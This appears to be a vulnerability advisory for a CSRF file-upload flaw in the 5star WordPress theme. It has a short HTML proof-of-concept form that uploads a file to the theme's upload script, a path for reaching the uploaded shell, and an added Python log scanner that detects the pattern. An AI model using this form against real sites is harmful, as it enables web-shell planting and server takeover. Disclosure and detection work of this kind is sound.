5star by Templatic - CSRF File Upload
Description
The 5star WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability.
Proof of Concept
<html>
<body>
<center>
<form method="post" enctype="multipart/form-data" action="https://example.com/wp-content/themes/5star/Monetize/general/upload-file.php">
  <input name="uploadfile[]" type="file" />
  <input type="submit" value="upload" />
</form>
</center>
</body>
</html>

File Access: https://example.com/wp-content/themes/5star/images/tmp/your_shell.php
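Detection sketch for the two request patterns in the proof of concept, added here as an example and not part of the original advisory. It assumes the web server writes Apache/nginx "combined" access-log lines; the sample log, the `site_host` parameter and the extension list are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Paths taken from the proof of concept above.
UPLOAD_PATH = "/wp-content/themes/5star/Monetize/general/upload-file.php"
TMP_DIR = "/wp-content/themes/5star/images/tmp/"
# Assumption: Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)
# Assumed list of script extensions that should never be requested from an upload directory.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2014:10:00:01 +0000] "GET /wp-content/themes/5star/style.css HTTP/1.1" 200 5120 "https://example.com/" "Mozilla/5.0"',
    '198.51.100.23 - - [01/Aug/2014:10:02:14 +0000] "POST /wp-content/themes/5star/Monetize/general/upload-file.php HTTP/1.1" 200 41 "https://other.example/page.html" "Mozilla/5.0"',
    '198.51.100.23 - - [01/Aug/2014:10:02:30 +0000] "GET /wp-content/themes/5star/images/tmp/sample.php HTTP/1.1" 200 12 "-" "curl/7.30"',
    '203.0.113.7 - - [01/Aug/2014:10:05:00 +0000] "GET /wp-content/themes/5star/images/tmp/photo.jpg HTTP/1.1" 200 20480 "https://example.com/listing" "Mozilla/5.0"',
]

def scan(lines, site_host):
    """Return (line_no, kind, detail) for requests that match the PoC pattern."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        # Drop the query string, decode %-escapes, collapse repeated slashes.
        path = re.sub(r"/{2,}", "/", unquote(urlsplit(m["target"]).path))
        if m["method"] == "POST" and path == UPLOAD_PATH:
            # A Referer on another host (or none at all) fits a forged cross-site form post.
            ref_host = urlsplit(m["referer"]).hostname
            kind = "upload" if ref_host == site_host else "cross-site-upload"
            findings.append((n, kind, m["ip"]))
        elif path.startswith(TMP_DIR) and SCRIPT_EXT.search(path):
            findings.append((n, "script-in-tmp", path))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, "example.com"):
        print(finding)
```

Any hit on the upload endpoint is worth reviewing on a site running this theme, since the advisory lists no known fix; the Referer check only separates same-site posts from cross-site ones.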
Affects Themes
No known fix
References
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Jje Incovers
Verified
No
WPVDB ID
Timeline
Publicly Published
2014-08-01 (about 9 years ago)
Added
2014-08-01 (about 9 years ago)
Last Updated
2021-01-13 (about 3 years ago)